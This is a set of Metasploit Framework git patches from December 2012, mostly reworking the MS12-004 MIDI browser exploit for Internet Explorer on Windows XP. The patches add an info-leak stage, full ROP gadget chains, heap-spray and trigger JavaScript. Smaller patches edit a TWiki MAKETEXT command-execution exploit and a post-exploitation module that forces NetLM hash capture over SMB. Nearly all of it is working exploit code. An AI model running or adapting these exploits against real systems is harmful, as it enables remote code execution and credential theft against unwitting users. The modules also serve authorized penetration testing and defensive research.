'#{badchar}'): #{str}" return false end # Check for commas outside of quoted arguments From e95f0267c64699550476baaaa72dad8a72186fe0 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 10:03:38 -0600 Subject: [PATCH 030/154] Update for some leaky icky --- .../exploits/windows/browser/ms12_004_midi.rb | 486 +++++++++++------- 1 file changed, 296 insertions(+), 190 deletions(-) diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb index d349ab50d3..987d1bd489 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb @@ -1,8 +1,8 @@ ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ ## require 'msf/core' @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, @@ -42,10 +43,13 @@ class Metasploit3 < Msf::Exploit::Remote (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. - Note: At this time, for IE 8 target, you may either choose the JRE ROP, or the - msvcrt ROP to bypass DEP (Data Execution Prevention). + Note: At this time, for IE 8 target, msvcrt ROP is used by default. However, + if you know your target's patch level, you may also try the 'MSHTML' advanced + option for an info leak based attack. Currently, this module only supports two + MSHTML builds: 8.0.6001.18702, which is often seen in a newly installed XP SP3. + Or 8.0.6001.19120, which is patch level before the MS12-004 fix. - Also, based on our testing, the vulnerability does not seem to trigger when + Also, based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop. }, 'License' => MSF_LICENSE, @@ -61,16 +65,16 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2012-0003' ], [ 'OSVDB', '78210'], [ 'BID', '51292'], - [ 'URL', 'http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php' ], + [ 'URL', 'http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php' ] ], 'Payload' => { - 'Space' => 1024, + 'Space' => 1024 }, 'DefaultOptions' => { 'EXITFUNC' => "process", - 'InitialAutoRunScript' => 'migrate -f', + 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => @@ -79,40 +83,27 @@ class Metasploit3 < Msf::Exploit::Remote [ 'IE 6 on Windows XP SP3', { - 'Rop' => nil, + 'Rop' => false, 'DispatchDst' => 0x0c0c0c0c } ], [ 'IE 7 on Windows XP SP3', { - 'Rop' => nil, + 'Rop' => false, 'DispatchDst' => 0x0c0c0c0c } ], [ - 'IE 8 on Windows XP SP3 with JRE ROP', + 'IE 8 on Windows XP SP3', { # xchg ecx,esp # or byte ptr [eax],al # add byte ptr [edi+5Eh],bl # ret 8 # From IMAGEHLP - 'Rop' => :msvcr71, - 'StackPivot' => 0x76C9B4C2, - 'DispatchDst' => 0x0c0c1be4 - } - ], - [ - 'IE 8 on Windows XP SP3 with msvcrt', - { - # xchg ecx,esp - # or byte ptr [eax],al - # add byte ptr [edi+5Eh],bl - # ret 8 - # From IMAGEHLP - 'Rop' => :msvcrt, - 'StackPivot' => 0x76C9B4C2, + 'Rop' => true, + 'StackPivot' => 0x76C9B4C2, 'DispatchDst' => 0x0c0c1bd0 } ] @@ -126,11 +117,39 @@ class Metasploit3 < Msf::Exploit::Remote OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) + register_advanced_options( + [ + OptEnum.new('MSHTML', + [ + false, "MSHTML Build Version", '', + [ + '', + '8.0.6001.18702', #newly installed Win XP SP3 non patched + '8.0.6001.19120' #fully patched before KB2598479 - been the same at least since Sep 2011 + ] + ]) + ], self.class) + end + + def exploit + @m_name, @midi = get_midi + @ml_name, @midi_leak = get_midi("leak") + @second_stage_url = rand_text_alpha(10) + @leak_param = rand_text_alpha(5) + + # Offset to CFunctionPointer vftable in MSHTML + case datastore['MSHTML'] + when '8.0.6001.18702' + @offset = 0xbf190 + when '8.0.6001.19120' + @offset = 0xd92c8 + end + super end def get_target(request) agent = request.headers['User-Agent'] - vprint_status("Request from: #{agent}") + print_status("Request as: #{agent}") if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/ #Windows XP SP3 + IE 6.0 @@ -139,14 +158,15 @@ class Metasploit3 < Msf::Exploit::Remote #Windows XP SP3 + IE 7.0 return targets[2] elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8\.0/ - #Windows XP SP3 + IE 8.0 + JRE6 + #Windows XP SP3 + IE 8.0 return targets[3] else return nil end end - def get_midi + # stage => "corruption" (default) | "leak" + def get_midi(stage="corruption") # MIDI Fileformat Reference: # http://www.sonicspot.com/guide/midifiles.html # @@ -183,9 +203,13 @@ class Metasploit3 < Msf::Exploit::Remote tc << "\x85\x50\x99\x23\x7F" # Corruption events - # Midi Channel Event - Note On - tc << "\x00\x9F\xb2\x73" - # Ends Corruption events + if stage == "corruption" + # Midi Channel Event - Note On + tc << "\x00\x9F\xb2\x73" + else + # Midi Channel Event - Note Off (trigger a leak) + tc << "\x00\x8F\xb2\x73" + end # Meta Event - End Of Track tc << "\x00\xFF\x2F\x00" @@ -201,58 +225,87 @@ class Metasploit3 < Msf::Exploit::Remote m << [tc.length].pack('N') m << tc - midi_name = "test_case.mid" + + #midi_name = "test_case.mid" + midi_name = rand_text_alpha(5) + ".mid" return midi_name, m end def on_request_uri(cli, request) - if request.uri =~ /\.mid$/i - print_status("Sending midi file") - send_response(cli, @midi, {'Content-Type'=>'application/octet-strem'}) - return - end - - #Set default target + # Initialize a target. If none suitable, then we don't continue. my_target = target - - #If user chooses automatic target, we choose one based on user agent if my_target.name =~ /Automatic/ my_target = get_target(request) - if my_target.nil? + agent = request.headers['User-Agent'] + if my_target.nil? and agent !~ /Windows\-Media\-Player|NSPlayer/ send_not_found(cli) print_error("Unknown user-agent") return end - vprint_status("Target selected: #{my_target.name}") + vprint_status("Target selected: #{my_target.name}") if not my_target.nil? end + # Send the corrupt midi file to trigger a memory leak, or a crash to that points + # to an arbitrary address. + if request.uri =~ /#{@ml_name}$/i + print_status("Testing for info leak...") + send_response(cli, @midi_leak, {'Content-Type'=>'application/octet-strem'}) + return + elsif request.uri =~ /#{@m_name}$/i + print_status("Sending midi corruption file...") + send_response(cli, @midi, {'Content-Type'=>'application/octet-strem'}) + return + end + + # Send the appropriate stage + if datastore['MSHTML'].to_s != '' and my_target['Rop'] + if request.uri =~ /#{@second_stage_url}/ + leak = begin + request.uri_parts["QueryString"][@leak_param].to_i + rescue + 0 + end + #print_status(leak.to_s) + print_status("Leaked address: 0x#{leak.to_s(16)}") + send_stage(cli, my_target, 'trigger', leak) + return + end + send_stage(cli, my_target, 'leak') + else + send_stage(cli, my_target) + end + end + + def send_stage(cli, my_target, stage='trigger', leak=0) midi_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource - midi_uri << "/#{@m_name}" - spray = build_spray(my_target) - - if datastore['OBFUSCATE'] - spray = ::Rex::Exploitation::JSObfu.new(spray) - spray.obfuscate + if stage == 'leak' + midi_uri << "/#{@ml_name}" + trigger = build_trigger(my_target, "leak") + else + midi_uri << "/#{@m_name}" + trigger = build_trigger(my_target) + spray = build_spray(my_target, leak) end - trigger = build_trigger(my_target) - trigger_fn = "trigger" - if datastore['OBFUSCATE'] + spray = ::Rex::Exploitation::JSObfu.new(spray).obfuscate trigger = ::Rex::Exploitation::JSObfu.new(trigger) trigger.obfuscate - trigger_fn = trigger.sym("trigger") + trigger_fn = trigger.sym('trigger') + else + trigger_fn = 'trigger' end html = %Q| + @@ -276,39 +329,34 @@ class Metasploit3 < Msf::Exploit::Remote html = html.gsub(/^\t\t/, '') - print_status("Sending HTML") + print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - def exploit - @m_name, @midi = get_midi - super - end - - def build_spray(my_target) + def build_spray(my_target, leak=0) # Extract string based on target - if my_target.name =~ /JRE ROP$/ + if my_target.name == 'IE 8 on Windows XP SP3' js_extract_str = "var block = shellcode.substring(2, (0x40000-0x21)/2);" - js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;" - elsif my_target.name =~ /msvcrt$/ - js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);" - js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;" else js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);" - js_shellcode = "var shellcode = nops.substring(0,0x800 - code.length) + code;" end # Build shellcode based on Rop requirement - if my_target['Rop'] - code = create_rop_chain(my_target) + code = '' + if my_target['Rop'] and datastore['MSHTML'].to_s != '' + print_status("Generating ROP using info-leak: #{leak.to_s(16)}") + code << create_info_leak_rop(my_target, leak) code << payload.encoded - shellcode = Rex::Text.to_unescape(code) + elsif my_target['Rop'] and datastore['MSHTML'].to_s == '' + print_status("Generating ROP using msvcrt") + code << create_rop(my_target, payload.encoded) else - code = payload.encoded - shellcode = Rex::Text.to_unescape(code) + code << payload.encoded end + shellcode = Rex::Text.to_unescape(code) + # 1. Create big block of nops # 2. Compose one block which is nops + shellcode # 3. Repeat the block @@ -321,9 +369,7 @@ class Metasploit3 < Msf::Exploit::Remote var nops = unescape("%u0c0c%u0c0c"); while (nops.length < 0x1000) nops+= nops; - - #{js_shellcode} - + var shellcode = nops.substring(0,0x800 - code.length) + code; while (shellcode.length < 0x40000) shellcode += shellcode; #{js_extract_str} @@ -340,7 +386,8 @@ class Metasploit3 < Msf::Exploit::Remote end # Build the JavaScript string for the attributes - def build_element(element_name, my_target) + # type => "corruption" (default) | "leak" + def build_element(element_name, my_target, type="corruption") dst = Rex::Text.to_unescape([my_target['DispatchDst']].pack("V")) element = '' @@ -356,7 +403,12 @@ class Metasploit3 < Msf::Exploit::Remote # Build attributes 0.upto(max) do |i| - obj = (i==index) ? "unescape(\"#{dst}\")" : "alert" + case type + when "corruption" + obj = (i==index) ? "unescape(\"#{dst}\")" : "alert" + else #leak + obj = "alert" + end element << "#{element_name}.w#{i.to_s} = #{obj}" + "\n" end @@ -369,54 +421,16 @@ class Metasploit3 < Msf::Exploit::Remote # 3. Make holes # 4. Let windows media play the crafted midi file and corrupt the heap # 5. Force the using of the confused tagVARIANT. - def build_trigger(my_target) - - if my_target.name =~ /IE 8 on Windows XP SP3/ - - # Redoing the feng shui if fails makes it reliable - js_trigger = <<-JSTRIGGER - function trigger(){ - var k = 999; - while (k > 0) { - if (typeof(clones[k].w1) == "string") { - } else { - clones[k].w1('come on!'); - } - k = k - 2; - } - feng_shui(); - document.audio.Play(); - } - JSTRIGGER - - select_element = build_element('selob', my_target) - else - - js_trigger = <<-JSTRIGGER - function trigger(){ - var k = 999; - while (k > 0) { - if (typeof(clones[k].w0) == "string") { - } else { - clones[k].w0('come on!'); - } - k = k - 2; - } - feng_shui(); - document.audio.Play(); - } - JSTRIGGER - - select_element = build_element('selob', my_target) - end + def build_trigger(my_target, type="corruption") + js_trigger = build_trigger_fn(my_target, type) + select_element = build_element('selob', my_target, type) trigger = <<-JS var heap = new heapLib.ie(); #{select_element} - var clones=new Array(1000); + var clones = new Array(1000); function feng_shui() { - heap.gc(); var i = 0; @@ -431,7 +445,6 @@ class Metasploit3 < Msf::Exploit::Remote CollectGarbage(); j = j + 2; } - } feng_shui(); @@ -443,85 +456,178 @@ class Metasploit3 < Msf::Exploit::Remote return trigger end - def junk(n=1) - tmp = [] - value = rand_text(4).unpack("L")[0].to_i - n.times { tmp << value } - return tmp + # type = "corruption" (default) | "leak" + def build_trigger_fn(my_target, type="corruption") + js_trigger="" + case type + when "corruption" + js_trigger = js_trigger_fn_corruption(my_target) + when "leak" + js_trigger = js_trigger_fn_leak(my_target) + end + return js_trigger end - def nop - return make_nops(4).unpack("L")[0].to_i + # Redoing the feng shui if fails makes it reliable + def js_trigger_fn_corruption(my_target) + attribute = (my_target.name == 'IE 8 on Windows XP SP3') ? 'w1' : 'w0' + + js = %Q| + function trigger(){ + var k = 999; + while (k > 0) { + if (typeof(clones[k].#{attribute}) == "string") { + } else { + clones[k].#{attribute}('come on!'); + } + k = k - 2; + } + feng_shui(); + document.audio.Play(); + } + | + + return js end - def create_rop_chain(my_target) + # Redoing the feng shui if fails makes it reliable + def js_trigger_fn_leak(my_target) - pivot = my_target['StackPivot'] + js_trigger = "" - case my_target['Rop'] - when :msvcrt - rop_gadgets = - [ - 0x77c539ee, # RETN - pivot, - junk, - 0x77c4e392, # POP EAX # RETN - 0x77c11120, # <- *&VirtualProtect() - 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN - junk, - 0x77c2dd6c, - 0x77c4ec00, # POP EBP # RETN - 0x77c35459, # ptr to 'push esp # ret' - 0x77c47705, # POP EBX # RETN - 0x00000400, # <- change size to mark as executable if needed (-> ebx) - 0x77c3ea01, # POP ECX # RETN - 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) - 0x77c46100, # POP EDI # RETN - 0x77c46101, # ROP NOP (-> edi) - 0x77c4d680, # POP EDX # RETN - 0x00000040, # newProtect (0x40) (-> edx) - 0x77c4e392, # POP EAX # RETN - nop, # NOPS (-> eax) - 0x77c12df9, # PUSHAD # RETN - ].flatten.pack("V*") + if my_target.name == 'IE 8 on Windows XP SP3' + js_trigger = <<-JSTRIGGER + function trigger(){ + //alert('trying the trigger'); + var k = 999; + while (k > 0) { + if (typeof(clones[k].w1) == "string") { + //alert('uaaa'); + var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0) + //alert(leak); + document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + leak + return; + } + k = k - 2; + } + //alert('retry'); + feng_shui(); + document.audio.Play(); + } + JSTRIGGER - when :msvcr71 - rop_gadgets = - [ - 0x7c347f98, # RETN (ROP NOP) - pivot, # stackpivot - junk, # padding - 0x7c376402, # POP EBP # RETN - 0x7c376402, # skip 4 bytes - 0x7c347f97, # POP EAX # RETN - 0xfffff800, # Value to negate, will become 0x00000201 (dwSize) - 0x7c351e05, # NEG EAX # RETN - 0x7c354901, # POP EBX # RETN - 0xffffffff, - 0x7c345255, # INC EBX # FPATAN # RETN - 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN - 0x7c344f87, # POP EDX # RETN - 0xffffffc0, # Value to negate, will become 0x00000040 - 0x7c351eb1, # NEG EDX # RETN - 0x7c34d201, # POP ECX # RETN - 0x7c38b001, # &Writable location - 0x7c34b8d7, # POP EDI # RETN - 0x7c347f98, # RETN (ROP NOP) - 0x7c364802, # POP ESI # RETN - 0x7c3415a2, # JMP [EAX] - 0x7c347f97, # POP EAX # RETN - 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF (IAT) - 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN - 0x7c345c30, # ptr to 'push esp # ret' - ].flatten.pack('V*') end - return rop_gadgets + return js_trigger end + def create_rop(t, p) + # MSVCRT.dll ROP + padding = '' + padding << [0x77C4CA70].pack("V*") #ADD ESP,0C; RET + padding << [t['StackPivot']].pack("V*") + padding << [0x77C4CA73].pack("V*") * 12 #ROP NOPs + generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'}) + end + def create_info_leak_rop(my_target, leak = 0x0) + base = (leak == 0x00) ? 0x63580000 : (leak - @offset) + print_status("Image base of mshtml: 0x%x" %base) + + # Generate the gadgets based on offset + rop_gadgets = '' + case @offset + when 0xd92c8 + rop_gadgets = + [ + :junk, + :junk, + 0x328468, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14 + :junk, + 0x247e5d, # ROP NOPs + 0x247e5d, + 0x247e5d, + 0x247e5d, + 0x247e5d, + 0x247e5d, + 0x247e5d, + 0x247e5c, # POP ESI # RETN [mshtml.dll] + 0x137c, # ptr to &VirtualProtect() [IAT mshtml.dll] + 0x3c8db7, # MOV EDX,DWORD PTR DS:[ESI] # ADD EAX,8BCE8B00 # RETN [mshtml.dll] + 0x42e239, # PUSH EDX # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x08 [mshtml.dll] + :junk, + 0x3460c, # POP EBP # RETN [mshtml.dll] + :junk, + :junk, + 0x23ef79, # & jmp esp [mshtml.dll] + 0x189303, # POP EBX # RETN [mshtml.dll] + :ebx, # 0x00000201-> ebx + 0x20437c, # POP EDX # RETN [mshtml.dll] + :edx, # 0x00000040-> edx + 0xc277, # POP ECX # RETN [mshtml.dll] + 0x53a47d, # &Writable location [mshtml.dll] + 0x4a33e2, # POP EDI # RETN [mshtml.dll] + 0x4b601, # RETN (ROP NOP) [mshtml.dll] + 0x33fbc6, # POP EAX # RETN [mshtml.dll] + :nop, + 0x52c718, # PUSHAD # RETN [mshtml.dll] + ] + + when 0xbf190 + rop_gadgets = + [ + :junk, + 0x3338ae, # push ecx # pop esp # pop edi # pop esi # pop ebp # retn 14 + :junk, + 0xe9e7, # POP ECX # RETN [mshtml.dll] 0x6358e9e7 + :junk, + :junk, + :junk, + :junk, + :junk, + 0x1318, #0x63581318, # ptr to &VirtualProtect() [IAT mshtml.dll] + 0x48b440, #0x63a0b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll] + 0x3dc745, #0x6395c745, # POP ESI # RETN [mshtml.dll] + :neg, #0xffffffff + 0x2fb18b, #0x6387b18b, # INC ESI # RETN [mshtml.dll] + 0x35190d, #0x638d190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll] + 0x4aada7, #0x63a2ada7, # POP EBP # RETN [mshtml.dll] + :filler, #Compensates RETN + :filler, #Compensates RETN + 0x1ffc54, #0x6377fc54, # & jmp esp [mshtml.dll] + 0x4498a7, #0x639c98a7, # POP EBX # RETN [mshtml.dll] + :ebx, # 0x00000800: 0x00000201-> ebx + 0x24cce4, #0x637ccce4, # POP EDX # RETN [mshtml.dll] + :edx, # 0x00000040-> edx + 0x158306, #0x636d8306, # POP ECX # RETN [mshtml.dll] + 0x535098, #0x63ab5098, # &Writable location [mshtml.dll] + 0x1cf217, #0x6374f217, # POP EDI # RETN [mshtml.dll] + 0xa0001, #0x63620001, # RETN (ROP NOP) [mshtml.dll] + 0x349f9b, #0x638c9f9b, # POP EAX # RETN [mshtml.dll] + :nop, #nop + 0x2afbe8, #0x6382fbe8, # PUSHAD # RETN [mshtml.dll] + ] + end + + rop_gadgets.map! { |e| + if e == :junk + rand_text(4).unpack("L")[0].to_i + elsif e == :neg + 0xffffffff + elsif e == :filler + 0x41414141 + elsif e == :ebx + 0x00000800 + elsif e == :edx + 0x00000040 + elsif e == :nop + 0x90909090 + else + base + e + end + } + + chain = rop_gadgets.pack('V*') + return chain + end end - -=begin -6367893A FF51 04 CALL DWORD PTR DS:[ECX+4] -=end From 4c58991c898bb069b0fc1a9b8b6703d0fba66eb5 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 10:35:28 -0600 Subject: [PATCH 031/154] Cleanup ROP a little --- modules/exploits/windows/browser/ms12_004_midi.rb | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb index 987d1bd489..e258bf0ba4 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb @@ -267,7 +267,6 @@ class Metasploit3 < Msf::Exploit::Remote rescue 0 end - #print_status(leak.to_s) print_status("Leaked address: 0x#{leak.to_s(16)}") send_stage(cli, my_target, 'trigger', leak) return @@ -345,7 +344,7 @@ class Metasploit3 < Msf::Exploit::Remote # Build shellcode based on Rop requirement code = '' if my_target['Rop'] and datastore['MSHTML'].to_s != '' - print_status("Generating ROP using info-leak: #{leak.to_s(16)}") + print_status("Generating ROP using info-leak: 0x#{leak.to_s(16)}") code << create_info_leak_rop(my_target, leak) code << payload.encoded elsif my_target['Rop'] and datastore['MSHTML'].to_s == '' @@ -592,8 +591,8 @@ class Metasploit3 < Msf::Exploit::Remote 0x2fb18b, #0x6387b18b, # INC ESI # RETN [mshtml.dll] 0x35190d, #0x638d190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll] 0x4aada7, #0x63a2ada7, # POP EBP # RETN [mshtml.dll] - :filler, #Compensates RETN - :filler, #Compensates RETN + :junk, #Compensates RETN + :junk, #Compensates RETN 0x1ffc54, #0x6377fc54, # & jmp esp [mshtml.dll] 0x4498a7, #0x639c98a7, # POP EBX # RETN [mshtml.dll] :ebx, # 0x00000800: 0x00000201-> ebx @@ -605,23 +604,23 @@ class Metasploit3 < Msf::Exploit::Remote 0xa0001, #0x63620001, # RETN (ROP NOP) [mshtml.dll] 0x349f9b, #0x638c9f9b, # POP EAX # RETN [mshtml.dll] :nop, #nop - 0x2afbe8, #0x6382fbe8, # PUSHAD # RETN [mshtml.dll] + 0x2afbe8 #0x6382fbe8, # PUSHAD # RETN [mshtml.dll] ] end + nops = make_nops(4).unpack("L")[0].to_i + rop_gadgets.map! { |e| if e == :junk rand_text(4).unpack("L")[0].to_i elsif e == :neg 0xffffffff - elsif e == :filler - 0x41414141 elsif e == :ebx 0x00000800 elsif e == :edx 0x00000040 elsif e == :nop - 0x90909090 + nops else base + e end From 3c398d0e62ec97e3f3ed21be34d6ebee1824adb9 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 10:46:36 -0600 Subject: [PATCH 032/154] Final cleanup --- .../exploits/windows/browser/ms12_004_midi.rb | 50 ++++++++----------- 1 file changed, 21 insertions(+), 29 deletions(-) diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb index e258bf0ba4..5e0ea4e7e8 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote [ false, "MSHTML Build Version", '', [ - '', + '', #Default (no leaky leaky) '8.0.6001.18702', #newly installed Win XP SP3 non patched '8.0.6001.19120' #fully patched before KB2598479 - been the same at least since Sep 2011 ] @@ -225,7 +225,6 @@ class Metasploit3 < Msf::Exploit::Remote m << [tc.length].pack('N') m << tc - #midi_name = "test_case.mid" midi_name = rand_text_alpha(5) + ".mid" @@ -491,30 +490,23 @@ class Metasploit3 < Msf::Exploit::Remote # Redoing the feng shui if fails makes it reliable def js_trigger_fn_leak(my_target) - js_trigger = "" - if my_target.name == 'IE 8 on Windows XP SP3' js_trigger = <<-JSTRIGGER function trigger(){ - //alert('trying the trigger'); var k = 999; while (k > 0) { if (typeof(clones[k].w1) == "string") { - //alert('uaaa'); var leak = clones[k].w1.charCodeAt(1)*0x10000 + clones[k].w1.charCodeAt(0) - //alert(leak); document.location = "#{get_resource}/#{@second_stage_url}" + "?#{@leak_param}=" + leak return; } k = k - 2; } - //alert('retry'); feng_shui(); document.audio.Play(); } JSTRIGGER - end return js_trigger @@ -569,7 +561,7 @@ class Metasploit3 < Msf::Exploit::Remote 0x4b601, # RETN (ROP NOP) [mshtml.dll] 0x33fbc6, # POP EAX # RETN [mshtml.dll] :nop, - 0x52c718, # PUSHAD # RETN [mshtml.dll] + 0x52c718 # PUSHAD # RETN [mshtml.dll] ] when 0xbf190 @@ -584,27 +576,27 @@ class Metasploit3 < Msf::Exploit::Remote :junk, :junk, :junk, - 0x1318, #0x63581318, # ptr to &VirtualProtect() [IAT mshtml.dll] - 0x48b440, #0x63a0b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll] - 0x3dc745, #0x6395c745, # POP ESI # RETN [mshtml.dll] - :neg, #0xffffffff - 0x2fb18b, #0x6387b18b, # INC ESI # RETN [mshtml.dll] - 0x35190d, #0x638d190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll] - 0x4aada7, #0x63a2ada7, # POP EBP # RETN [mshtml.dll] - :junk, #Compensates RETN - :junk, #Compensates RETN - 0x1ffc54, #0x6377fc54, # & jmp esp [mshtml.dll] - 0x4498a7, #0x639c98a7, # POP EBX # RETN [mshtml.dll] + 0x1318, # ptr to &VirtualProtect() [IAT mshtml.dll] + 0x48b440, # MOV EDX,DWORD PTR DS:[ECX] # RETN [mshtml.dll] + 0x3dc745, # POP ESI # RETN [mshtml.dll] + :neg, # 0xffffffff + 0x2fb18b, # INC ESI # RETN [mshtml.dll] + 0x35190d, # ADC ESI,EDX # DEC ECX # RETN 08 [mshtml.dll] + 0x4aada7, # POP EBP # RETN [mshtml.dll] + :junk, # Compensates RETN + :junk, # Compensates RETN + 0x1ffc54, # & jmp esp [mshtml.dll] + 0x4498a7, # POP EBX # RETN [mshtml.dll] :ebx, # 0x00000800: 0x00000201-> ebx - 0x24cce4, #0x637ccce4, # POP EDX # RETN [mshtml.dll] + 0x24cce4, # POP EDX # RETN [mshtml.dll] :edx, # 0x00000040-> edx - 0x158306, #0x636d8306, # POP ECX # RETN [mshtml.dll] - 0x535098, #0x63ab5098, # &Writable location [mshtml.dll] - 0x1cf217, #0x6374f217, # POP EDI # RETN [mshtml.dll] - 0xa0001, #0x63620001, # RETN (ROP NOP) [mshtml.dll] - 0x349f9b, #0x638c9f9b, # POP EAX # RETN [mshtml.dll] - :nop, #nop - 0x2afbe8 #0x6382fbe8, # PUSHAD # RETN [mshtml.dll] + 0x158306, # POP ECX # RETN [mshtml.dll] + 0x535098, # &Writable location [mshtml.dll] + 0x1cf217, # POP EDI # RETN [mshtml.dll] + 0xa0001, # RETN (ROP NOP) [mshtml.dll] + 0x349f9b, # POP EAX # RETN [mshtml.dll] + :nop, + 0x2afbe8 # PUSHAD # RETN [mshtml.dll] ] end From 115ad9ae33a1b33ffbba9642068ba44d46248635 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 12:56:44 -0600 Subject: [PATCH 033/154] Small corrections --- modules/exploits/unix/webapp/twiki_maketext.rb | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/modules/exploits/unix/webapp/twiki_maketext.rb b/modules/exploits/unix/webapp/twiki_maketext.rb index 229a40184c..e1b43c3098 100644 --- a/modules/exploits/unix/webapp/twiki_maketext.rb +++ b/modules/exploits/unix/webapp/twiki_maketext.rb @@ -16,18 +16,17 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'TWiki MAKETEXT Remote Command Execution', 'Description' => %q{ - This module exploits a vulnerability in the MAKETEXT Twiki variable. Using a + This module exploits a vulnerability in the MAKETEXT Twiki variable. By using a specially crafted MAKETEXT, a malicious user can execute shell commands since user input is passed to the Perl "eval" command without first being sanitized. The problem is caused by an underlying security issue in the CPAN:Locale::Maketext module. This works in TWiki sites that have user interface localization enabled (UserInterfaceInternationalisation variable set). - If USERNAME and PASSWORD credentials aren't provided anonymous access will be - intended. On the other hand, if the TwikiPage option isn't provided, the module - will try to create a random page on the SandBox space. The modules has been tested - successfully on TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 - virtual machine. + If USERNAME and PASSWORD aren't provided, anonymous access will be tried. Also, + if the 'TwikiPage' option isn't provided, the module will try to create a random + page on the SandBox space. The modules has been tested successfully on + TWiki 5.1.2 as distributed with the official TWiki-VM-5.1.2-1 virtual machine. }, 'Author' => [ @@ -46,12 +45,11 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'DisableNops' => true, - 'BadChars' => '', 'Space' => 1024, 'Compat' => { 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic ruby python bash telnet', + 'RequiredCmd' => 'generic ruby python bash telnet' } }, 'Platform' => [ 'unix' ], From e9c00488fa604138dcd8c88f67ad521bc6c7c7c3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Fri, 21 Dec 2012 13:00:08 -0600 Subject: [PATCH 034/154] Return value does not need to be checked, says zeknox --- modules/post/windows/gather/netlm_downgrade.rb | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/post/windows/gather/netlm_downgrade.rb b/modules/post/windows/gather/netlm_downgrade.rb index b0650415d1..3ee51c7c9b 100644 --- a/modules/post/windows/gather/netlm_downgrade.rb +++ b/modules/post/windows/gather/netlm_downgrade.rb @@ -49,10 +49,8 @@ class Metasploit3 < Msf::Post def smb_connect begin print_status("Establishing SMB connection to " + datastore['SMBHOST']) - res = cmd_exec("cmd.exe","/c net use \\\\#{datastore['SMBHOST']}") - if res =~ /The command completed successfully/ - print_good("The SMBHOST should now have NetLM hashes") - end + cmd_exec("cmd.exe","/c net use \\\\#{datastore['SMBHOST']}") + print_good("The SMBHOST should now have NetLM hashes") rescue print_error("Issues establishing SMB connection") end From 02782258eb2d7eb1a58e399263f73963cf6eb06f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 21 Dec 2012 21:01:39 +0100 Subject: [PATCH 035/154] fix eol for ms12_004_midi --- .../exploits/windows/browser/ms12_004_midi.rb | 26 +++++++++---------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/modules/exploits/windows/browser/ms12_004_midi.rb b/modules/exploits/windows/browser/ms12_004_midi.rb index 5e0ea4e7e8..c07fe6214b 100644 --- a/modules/exploits/windows/browser/ms12_004_midi.rb +++ b/modules/exploits/windows/browser/ms12_004_midi.rb @@ -140,9 +140,9 @@ class Metasploit3 < 